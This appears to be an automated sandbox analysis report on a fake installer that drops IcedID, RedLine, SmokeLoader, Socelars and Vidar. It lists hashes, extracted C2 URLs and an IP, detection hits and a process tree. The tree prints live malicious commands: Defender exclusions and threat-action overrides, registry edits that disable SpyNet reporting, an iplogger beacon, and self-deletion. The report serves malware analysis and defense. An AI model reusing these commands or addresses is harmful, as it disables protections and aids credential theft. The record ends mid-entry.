icedid | 56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11

Target

setup_x86_x64_install.exe
Size

4.0MB
MD5

73491325fde5366b31c09da701d07dd6
SHA1

a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
SHA256

56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
SHA512

28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88

Score

10^/10

icedid redline smokeloader socelars vidar 199qwe 706 3162718704 aspackv2 backdoor banker infostealer stealer suricata themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://shellloader.com/welcome

Extracted

Family

vidar

Version

40.7

Botnet

706

https://petrenko96.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

199qwe

185.215.113.104:18754

Extracted

Family

icedid

Campaign

3162718704

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4468	3592	rundll32.exe	17
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6296	3592	rundll32.exe	17
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8804	3592	rundll32.exe	17
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8300	3592	rundll32.exe	17

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 3 IoCs

resource	yara_rule
behavioral7/memory/5208-328-0x000000000041C5DA-mapping.dmp	family_redline
behavioral7/memory/5208-326-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral7/memory/5800-457-0x000000000041C5DE-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral7/files/0x000400000001ab56-169.dat	family_socelars
behavioral7/files/0x000400000001ab56-140.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral7/memory/2764-262-0x0000000000400000-0x00000000004D7000-memory.dmp	family_vidar
behavioral7/memory/2764-260-0x0000000000980000-0x0000000000A54000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral7/files/0x000400000001ab4b-123.dat	aspack_v212_v242
behavioral7/files/0x000400000001ab4a-124.dat	aspack_v212_v242
behavioral7/files/0x000400000001ab4d-127.dat	aspack_v212_v242
behavioral7/files/0x000400000001ab4a-129.dat	aspack_v212_v242
behavioral7/files/0x000400000001ab4d-131.dat	aspack_v212_v242
behavioral7/files/0x000400000001ab4a-128.dat	aspack_v212_v242
behavioral7/files/0x000400000001ab4b-125.dat	aspack_v212_v242

Blocklisted process makes network request 1 IoCs

flow	pid	Process
15	584	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 15 IoCs

pid	Process
912	setup_installer.exe
1144	setup_install.exe
2652	Sun1917b8fb5f09db8.exe
1792	Sun193fda712d9f1.exe
584	powershell.exe
3988	Sun19e4ade31b2a.exe
3184	Sun1908b94df837b3158.exe
2764	Sun19eb40faaaa9.exe
4168	Sun191101c1aaa.exe
4152	Sun195a1614ec24e6a.exe
4160	Sun19de8ff4b6aefeb8.exe
4188	f.exe
4204	Sun198361825f4.exe
4312	Sun1966fb31dd5a07.exe
4472	schtasks.exe

Loads dropped DLL 7 IoCs

pid	Process
1144	setup_install.exe
1144	setup_install.exe
1144	setup_install.exe
1144	setup_install.exe
1144	setup_install.exe
1144	setup_install.exe
4472	schtasks.exe

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral7/files/0x000400000001ab77-270.dat	themida

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
254	ip-api.com
376	ipinfo.io
377	ipinfo.io
10	ip-api.com
78	ipinfo.io
82	ipinfo.io
252	ipinfo.io
253	ipinfo.io

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 19 IoCs

pid	pid_target	Process	procid_target
5888	5116	WerFault.exe	108
3640	4160	WerFault.exe	93
4716	4248	WerFault.exe
5552	4352	WerFault.exe
2628	4248	WerFault.exe
5380	4160	WerFault.exe	93
5916	4248	WerFault.exe
3808	4160	WerFault.exe	93
6024	4248	WerFault.exe
4488	4160	WerFault.exe	93
4240	4248	WerFault.exe
5092	4248	WerFault.exe
4412	4160	WerFault.exe	93
5708	2764	WerFault.exe	87
6220	4160	WerFault.exe	93
6676	4160	WerFault.exe	93
7032	4160	WerFault.exe	93
4548	4160	WerFault.exe	93
5524	4160	WerFault.exe	93

Creates scheduled task(s) 1 TTPs 16 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
10128	schtasks.exe
4420	schtasks.exe
4124	schtasks.exe
4472	schtasks.exe
7928	schtasks.exe
8412	schtasks.exe
228	schtasks.exe
9672	schtasks.exe
9748	schtasks.exe
7556	schtasks.exe
5216	schtasks.exe
6240	schtasks.exe
7960	schtasks.exe
9904	schtasks.exe
9404	schtasks.exe
6196	schtasks.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
8468	timeout.exe
5592	timeout.exe
7336	timeout.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
6392	taskkill.exe
7056	taskkill.exe
5456	taskkill.exe
9176	taskkill.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	17	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3828	powershell.exe
3828	powershell.exe

Suspicious use of AdjustPrivilegeToken 38 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	584	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	584	powershell.exe
Token: SeLockMemoryPrivilege	584	powershell.exe
Token: SeIncreaseQuotaPrivilege	584	powershell.exe
Token: SeMachineAccountPrivilege	584	powershell.exe
Token: SeTcbPrivilege	584	powershell.exe
Token: SeSecurityPrivilege	584	powershell.exe
Token: SeTakeOwnershipPrivilege	584	powershell.exe
Token: SeLoadDriverPrivilege	584	powershell.exe
Token: SeSystemProfilePrivilege	584	powershell.exe
Token: SeSystemtimePrivilege	584	powershell.exe
Token: SeProfSingleProcessPrivilege	584	powershell.exe
Token: SeIncBasePriorityPrivilege	584	powershell.exe
Token: SeCreatePagefilePrivilege	584	powershell.exe
Token: SeCreatePermanentPrivilege	584	powershell.exe
Token: SeBackupPrivilege	584	powershell.exe
Token: SeRestorePrivilege	584	powershell.exe
Token: SeShutdownPrivilege	584	powershell.exe
Token: SeDebugPrivilege	584	powershell.exe
Token: SeAuditPrivilege	584	powershell.exe
Token: SeSystemEnvironmentPrivilege	584	powershell.exe
Token: SeChangeNotifyPrivilege	584	powershell.exe
Token: SeRemoteShutdownPrivilege	584	powershell.exe
Token: SeUndockPrivilege	584	powershell.exe
Token: SeSyncAgentPrivilege	584	powershell.exe
Token: SeEnableDelegationPrivilege	584	powershell.exe
Token: SeManageVolumePrivilege	584	powershell.exe
Token: SeImpersonatePrivilege	584	powershell.exe
Token: SeCreateGlobalPrivilege	584	powershell.exe
Token: 31	584	powershell.exe
Token: 32	584	powershell.exe
Token: 33	584	powershell.exe
Token: 34	584	powershell.exe
Token: 35	584	powershell.exe
Token: SeDebugPrivilege	4168	Sun191101c1aaa.exe
Token: SeDebugPrivilege	3988	Sun19e4ade31b2a.exe
Token: SeDebugPrivilege	3828	powershell.exe
Token: SeDebugPrivilege	4152	Sun195a1614ec24e6a.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 504 wrote to memory of 912	504	setup_x86_x64_install.exe	75
PID 504 wrote to memory of 912	504	setup_x86_x64_install.exe	75
PID 504 wrote to memory of 912	504	setup_x86_x64_install.exe	75
PID 912 wrote to memory of 1144	912	Process not Found	76
PID 912 wrote to memory of 1144	912	Process not Found	76
PID 912 wrote to memory of 1144	912	Process not Found	76
PID 1144 wrote to memory of 2204	1144	setup_install.exe	79
PID 1144 wrote to memory of 2204	1144	setup_install.exe	79
PID 1144 wrote to memory of 2204	1144	setup_install.exe	79
PID 1144 wrote to memory of 2400	1144	setup_install.exe	80
PID 1144 wrote to memory of 2400	1144	setup_install.exe	80
PID 1144 wrote to memory of 2400	1144	setup_install.exe	80
PID 1144 wrote to memory of 3032	1144	setup_install.exe	81
PID 1144 wrote to memory of 3032	1144	setup_install.exe	81
PID 1144 wrote to memory of 3032	1144	setup_install.exe	81
PID 1144 wrote to memory of 2604	1144	setup_install.exe	178
PID 1144 wrote to memory of 2604	1144	setup_install.exe	178
PID 1144 wrote to memory of 2604	1144	setup_install.exe	178
PID 2400 wrote to memory of 2652	2400	cmd.exe	179
PID 2400 wrote to memory of 2652	2400	cmd.exe	179
PID 2400 wrote to memory of 2652	2400	cmd.exe	179
PID 1144 wrote to memory of 2892	1144	setup_install.exe	82
PID 1144 wrote to memory of 2892	1144	setup_install.exe	82
PID 1144 wrote to memory of 2892	1144	setup_install.exe	82
PID 1144 wrote to memory of 3484	1144	setup_install.exe	83
PID 1144 wrote to memory of 3484	1144	setup_install.exe	83
PID 1144 wrote to memory of 3484	1144	setup_install.exe	83
PID 1144 wrote to memory of 4072	1144	setup_install.exe	177
PID 1144 wrote to memory of 4072	1144	setup_install.exe	177
PID 1144 wrote to memory of 4072	1144	setup_install.exe	177
PID 1144 wrote to memory of 3748	1144	setup_install.exe	176
PID 1144 wrote to memory of 3748	1144	setup_install.exe	176
PID 1144 wrote to memory of 3748	1144	setup_install.exe	176
PID 1144 wrote to memory of 1796	1144	setup_install.exe	106
PID 1144 wrote to memory of 1796	1144	setup_install.exe	106
PID 1144 wrote to memory of 1796	1144	setup_install.exe	106
PID 2604 wrote to memory of 1792	2604	cmd.exe	104
PID 2604 wrote to memory of 1792	2604	cmd.exe	104
PID 1144 wrote to memory of 512	1144	setup_install.exe	84
PID 1144 wrote to memory of 512	1144	setup_install.exe	84
PID 1144 wrote to memory of 512	1144	setup_install.exe	84
PID 2204 wrote to memory of 3828	2204	cmd.exe	100
PID 2204 wrote to memory of 3828	2204	cmd.exe	100
PID 2204 wrote to memory of 3828	2204	cmd.exe	100
PID 1144 wrote to memory of 3908	1144	setup_install.exe	270
PID 1144 wrote to memory of 3908	1144	setup_install.exe	270
PID 1144 wrote to memory of 3908	1144	setup_install.exe	270
PID 3032 wrote to memory of 584	3032	cmd.exe	97
PID 3032 wrote to memory of 584	3032	cmd.exe	97
PID 3032 wrote to memory of 584	3032	cmd.exe	97
PID 1144 wrote to memory of 908	1144	setup_install.exe	96
PID 1144 wrote to memory of 908	1144	setup_install.exe	96
PID 1144 wrote to memory of 908	1144	setup_install.exe	96
PID 1144 wrote to memory of 684	1144	setup_install.exe	85
PID 1144 wrote to memory of 684	1144	setup_install.exe	85
PID 1144 wrote to memory of 684	1144	setup_install.exe	85
PID 2892 wrote to memory of 3988	2892	cmd.exe	95
PID 2892 wrote to memory of 3988	2892	cmd.exe	95
PID 3484 wrote to memory of 3184	3484	cmd.exe	86
PID 3484 wrote to memory of 3184	3484	cmd.exe	86
PID 3484 wrote to memory of 3184	3484	cmd.exe	86
PID 1796 wrote to memory of 2764	1796	cmd.exe	87
PID 1796 wrote to memory of 2764	1796	cmd.exe	87
PID 1796 wrote to memory of 2764	1796	cmd.exe	87

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:504
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  PID:912
- - C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1144
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2204
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3828
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2400
    - - C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun1917b8fb5f09db8.exe
        
        Sun1917b8fb5f09db8.exe
        5⤵
        Executes dropped EXE
        
        PID:2652
      - C:\Users\Admin\Documents\GT0Pa0vhlC5RboqnX30EW6Gp.exe
        
        "C:\Users\Admin\Documents\GT0Pa0vhlC5RboqnX30EW6Gp.exe"
        6⤵
        
        PID:6728
      - C:\Users\Admin\Documents\NAdHIcKSgkYS2BiJus1YCCNH.exe
        
        "C:\Users\Admin\Documents\NAdHIcKSgkYS2BiJus1YCCNH.exe"
        6⤵
        
        PID:6228
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c start "" "f.exe" & start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
        7⤵
        
        PID:6572
        
        C:\Users\Admin\AppData\Local\Temp\f.exe
        
        "f.exe"
        8⤵
        Executes dropped EXE
        
        PID:4188
        
        C:\Users\Admin\AppData\Local\237843444.exe
        
        "C:\Users\Admin\AppData\Local\237843444.exe"
        9⤵
        
        PID:7488
        
        C:\Users\Admin\AppData\Local\Temp\wwi.exe
        
        "wwi.exe"
        8⤵
        
        PID:816
        
        C:\Users\Admin\AppData\Local\Temp\wwl.exe
        
        "wwl.exe"
        8⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
        8⤵
        
        PID:5356
      - C:\Users\Admin\Documents\Oxv1ees2Gkntm9ty9Ec3BxV8.exe
        
        "C:\Users\Admin\Documents\Oxv1ees2Gkntm9ty9Ec3BxV8.exe"
        6⤵
        
        PID:6408
        
        C:\Program Files (x86)\Company\NewProduct\inst001.exe
        
        "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
        7⤵
        
        PID:6472
        
        C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
        
        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
        7⤵
        
        PID:6360
        
        C:\Program Files (x86)\Company\NewProduct\cm3.exe
        
        "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
        7⤵
        
        PID:6616
      - C:\Users\Admin\Documents\dlIdQFrFqaRbVimziU9DEXV0.exe
        
        "C:\Users\Admin\Documents\dlIdQFrFqaRbVimziU9DEXV0.exe"
        6⤵
        
        PID:5856
      - C:\Users\Admin\Documents\XO8zOKcKprOKJaS_SVAVQF2U.exe
        
        "C:\Users\Admin\Documents\XO8zOKcKprOKJaS_SVAVQF2U.exe"
        6⤵
        
        PID:6040
        
        C:\Users\Admin\Documents\XO8zOKcKprOKJaS_SVAVQF2U.exe
        
        C:\Users\Admin\Documents\XO8zOKcKprOKJaS_SVAVQF2U.exe
        7⤵
        
        PID:4584
        
        C:\Users\Admin\Documents\XO8zOKcKprOKJaS_SVAVQF2U.exe
        
        C:\Users\Admin\Documents\XO8zOKcKprOKJaS_SVAVQF2U.exe
        7⤵
        
        PID:3492
      - C:\Users\Admin\Documents\ZSwINuVierE7iBalURSc5Yqp.exe
        
        "C:\Users\Admin\Documents\ZSwINuVierE7iBalURSc5Yqp.exe"
        6⤵
        
        PID:2104
      - C:\Users\Admin\Documents\6bzTifqHW5jfK09MWW0YvVY7.exe
        
        "C:\Users\Admin\Documents\6bzTifqHW5jfK09MWW0YvVY7.exe"
        6⤵
        
        PID:6492
      - C:\Users\Admin\Documents\QAs94Scwv71RCgsdPmWFqLx_.exe
        
        "C:\Users\Admin\Documents\QAs94Scwv71RCgsdPmWFqLx_.exe"
        6⤵
        
        PID:5360
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\QAs94Scwv71RCgsdPmWFqLx_.exe"
        7⤵
        
        PID:3908
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        8⤵
        Delays execution with timeout.exe
        
        PID:5592
      - C:\Users\Admin\Documents\oGco5T5rtxxdDl0LdT9Yi3om.exe
        
        "C:\Users\Admin\Documents\oGco5T5rtxxdDl0LdT9Yi3om.exe"
        6⤵
        
        PID:6884
      - C:\Users\Admin\Documents\YAJ4s0C3ILIszOQ4iPK5DPYu.exe
        
        "C:\Users\Admin\Documents\YAJ4s0C3ILIszOQ4iPK5DPYu.exe"
        6⤵
        
        PID:6468
        
        C:\Users\Admin\Documents\YAJ4s0C3ILIszOQ4iPK5DPYu.exe
        
        C:\Users\Admin\Documents\YAJ4s0C3ILIszOQ4iPK5DPYu.exe
        7⤵
        
        PID:5936
        
        C:\Users\Admin\Documents\YAJ4s0C3ILIszOQ4iPK5DPYu.exe
        
        C:\Users\Admin\Documents\YAJ4s0C3ILIszOQ4iPK5DPYu.exe
        7⤵
        
        PID:5560
      - C:\Users\Admin\Documents\s1Ozpl4ZXS31OxhS0GjAo0P9.exe
        
        "C:\Users\Admin\Documents\s1Ozpl4ZXS31OxhS0GjAo0P9.exe"
        6⤵
        
        PID:4892
      - C:\Users\Admin\Documents\dB2FM4QqYxqmTBdFWzw7aq28.exe
        
        "C:\Users\Admin\Documents\dB2FM4QqYxqmTBdFWzw7aq28.exe"
        6⤵
        
        PID:6380
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "dB2FM4QqYxqmTBdFWzw7aq28.exe" /f & erase "C:\Users\Admin\Documents\dB2FM4QqYxqmTBdFWzw7aq28.exe" & exit
        7⤵
        
        PID:7364
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "dB2FM4QqYxqmTBdFWzw7aq28.exe" /f
        8⤵
        Kills process with taskkill
        
        PID:7056
      - C:\Users\Admin\Documents\Dl1Av9OHZkVRE4wHNvdMEMB_.exe
        
        "C:\Users\Admin\Documents\Dl1Av9OHZkVRE4wHNvdMEMB_.exe"
        6⤵
        
        PID:5544
        
        C:\Users\Admin\Documents\Dl1Av9OHZkVRE4wHNvdMEMB_.exe
        
        "C:\Users\Admin\Documents\Dl1Av9OHZkVRE4wHNvdMEMB_.exe"
        7⤵
        
        PID:4852
      - C:\Users\Admin\Documents\kQ8SuI0jykE7x5f_VMf40PWT.exe
        
        "C:\Users\Admin\Documents\kQ8SuI0jykE7x5f_VMf40PWT.exe"
        6⤵
        
        PID:6356
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im kQ8SuI0jykE7x5f_VMf40PWT.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\kQ8SuI0jykE7x5f_VMf40PWT.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:8052
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im kQ8SuI0jykE7x5f_VMf40PWT.exe /f
        8⤵
        Kills process with taskkill
        
        PID:5456
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        8⤵
        Delays execution with timeout.exe
        
        PID:7336
      - C:\Users\Admin\Documents\yOgwDAswXc_lN4P47KQnsQpK.exe
        
        "C:\Users\Admin\Documents\yOgwDAswXc_lN4P47KQnsQpK.exe"
        6⤵
        
        PID:6332
      - C:\Users\Admin\Documents\KJmkCY43PnK0yg72rjrojJu6.exe
        
        "C:\Users\Admin\Documents\KJmkCY43PnK0yg72rjrojJu6.exe"
        6⤵
        
        PID:2172
      - C:\Users\Admin\Documents\DmWm3KBRXjk36P432DvB_GjC.exe
        
        "C:\Users\Admin\Documents\DmWm3KBRXjk36P432DvB_GjC.exe"
        6⤵
        
        PID:5416
        
        C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
        
        "C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
        7⤵
        
        PID:7620
        
        C:\Users\Admin\Documents\k7nsiQ78jAyfI_GJJGW8jCEc.exe
        
        "C:\Users\Admin\Documents\k7nsiQ78jAyfI_GJJGW8jCEc.exe"
        8⤵
        
        PID:8968
        
        C:\Users\Admin\Documents\XDMiK93Ik6hTNmb7gAEJVk9x.exe
        
        "C:\Users\Admin\Documents\XDMiK93Ik6hTNmb7gAEJVk9x.exe" /mixtwo
        8⤵
        
        PID:5224
        
        C:\Users\Admin\Documents\9BlNLDWpP8aWLHEHafb0jbIO.exe
        
        "C:\Users\Admin\Documents\9BlNLDWpP8aWLHEHafb0jbIO.exe"
        8⤵
        
        PID:7300
        
        C:\Users\Admin\AppData\Local\Temp\7zSB916.tmp\Install.exe
        
        .\Install.exe
        9⤵
        
        PID:7812
        
        C:\Users\Admin\AppData\Local\Temp\7zSC069.tmp\Install.exe
        
        .\Install.exe /S /site_id "668658"
        10⤵
        
        PID:6932
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
        11⤵
        
        PID:7496
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
        12⤵
        
        PID:8404
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        13⤵
        
        PID:7876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        14⤵
        Blocklisted process makes network request
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:584
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        15⤵
        
        PID:8000
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
        12⤵
        
        PID:9256
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        13⤵
        
        PID:9644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        14⤵
        
        PID:6904
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        11⤵
        
        PID:4380
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        12⤵
        
        PID:7492
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        13⤵
        
        PID:9140
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        13⤵
        
        PID:6396
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        11⤵
        
        PID:8916
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        12⤵
        
        PID:5880
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        13⤵
        
        PID:8540
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        13⤵
        
        PID:8732
        
        C:\Windows\SysWOW64\schtasks.exe
        
